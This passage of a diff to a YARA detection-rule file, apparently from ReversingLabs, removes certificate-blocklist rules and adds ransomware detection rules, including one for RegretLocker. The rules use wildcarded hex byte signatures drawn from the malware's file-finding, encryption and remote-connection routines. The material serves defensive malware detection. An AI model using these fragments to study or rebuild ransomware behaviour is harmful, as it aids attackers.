+            00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D
+            09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ??
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00
+            DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC
+            28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A
+        }
+		$find_files = {
+            02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ??
+            08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ??
+            DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ??
+            ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00
+            DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ??
+            ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEP, OOO" and pe.signatures [ i ] . serial == "67:2d:44:28:45:0a:fc:c2:4f:c6:09:69:a5:06:3a:3e" and 1597381260 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_attack ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Df479E14A70C7970A4De3Dd3E4Bb0318 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Regretlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RegretLocker ransomware."
 		author = "ReversingLabs"
-		id = "465fc41c-920d-55e6-8616-a51d1f77b158"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c4e515cc-b0c2-57b2-a230-619ec01ac8d4"
+		date = "2021-04-02"
+		modified = "2021-04-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4704-L4722"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "35b1f04cf5d5d1d89db537bf75737e3af5945e594f4d4231e9ae3e7fba52fc0d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.RegretLocker.yara#L1-L206"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3927dfecacd74f60a169f82b68df5747daa90eaba77f24c5e730ce4c48d426a3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RegretLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOFTWARE HUB IT LTD" and ( pe.signatures [ i ] . serial == "00:df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" or pe.signatures [ i ] . serial == "df:47:9e:14:a7:0c:79:70:a4:de:3d:d3:e4:bb:03:18" ) and 1591660800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_2924785Fd7990B2D510675176Dae2Bed : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6898e95c-ee31-57a3-b764-99bf9008d0fe"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4724-L4740"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e308ca5f24ed5811e947289caf9aa820a16b08ea183c7aa9826f8a726fb5c3cf"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 8B 41 ?? 8B 55 ?? 3B C2 72 ?? 2B C2 56 8B 75 ?? 3B C6 0F 42 F0 83 79 ?? ??
+            72 ?? 8B 09 56 03 CA 51 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 5E 5D C2 ?? ?? E8 ??
+            ?? ?? ?? CC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 83 65 ?? ?? 8D 45 ?? 53
+            56 57 50 E8 ?? ?? ?? ?? 83 65 ?? ?? 50 E8 ?? ?? ?? ?? 83 4D ?? ?? 8A D8 59 59 8D 4D
+            ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ??
+            C7 45 ?? ?? ?? ?? ?? 8B CC 6A ?? 83 61 ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88
+            19 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8B 8D ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 6A ?? 5B 3B CB C6 45 ?? ?? 0F 43 C2 80 78 ??
+            ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ??
+            0F 43 C2 80 78 ?? ?? 75 ?? 3B CB 8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 3B CB
+            8D 85 ?? ?? ?? ?? 0F 43 C2 80 78 ?? ?? 75 ?? 83 BD ?? ?? ?? ?? ?? 0F 84
+        }
+		$remote_connection_p2 = {
+            8D 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B C8 C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 75 ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 3B FB 8D B5 ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F 43 C3 83 FF ?? 0F 43 F3 0F 43 D3 33 C9 8A 40 ?? 3A
+            46 ?? 0F BE 42 ?? 0F 94 C1 3B C8 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ??
+            ?? 75 ?? 83 FF ?? 8D 85 ?? ?? ?? ?? 0F 43 C3 80 78 ?? ?? 74 ?? 32 DB EB ?? B3 ?? F6
+            45 ?? ?? 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 DB 74 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5F 6A ?? 33 DB 89 BD
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ?? ?? ??
+            88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? C6 45 ?? ?? 83 FE ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 74 ?? 6A ?? 5E 83 EC ?? 8B CC 89 65 ?? 53 89 59 ?? 89 79 ?? 68 ?? ??
+            ?? ?? 88 19 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ??
+            89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+        }
+		$remote_connection_p3 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89
+            5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B
+            F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ??
+            ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ??
+            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45
+        }
+		$remote_connection_p4 = {
+            89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A
+            ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45
+            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ??
+            ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ??
+            8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ??
+            89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89
+        }
+		$remote_connection_p5 = {
+            5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58
+            FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68
+            ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ??
+            C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
+            ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50
+            8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ??
+            ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ??
+            68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ??
+            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1
+            ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45
+            ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7
+            45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ??
+            88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ??
+            8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8
+        }
+		$encrypt_files_p1 = {
+            8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89
+            45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ??
+            8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D
+            4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A
+            ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ??
+            C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ??
+            ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ??
+            ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75
+            ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ??
+            ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99
+            F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B
+            75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC
+            F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35
+            ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8
+        }
+		$encrypt_files_p2 = {
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57
+            56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59
+            59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ??
+            ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ??
+            ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89
+            4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8
+            ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ??
+            ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F
+            46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D
+            ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B
+        }
+		$encrypt_files_p3 = {
+            C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8
+            ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75
+            ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8
+            33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8
+            ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03
+            7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75
+            ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ??
+            8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ??
+            C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ??
+            89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ??
+            E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC
+            ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ??
+            ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ??
+            8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ??
+            8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ??
+            89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3
+        }
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
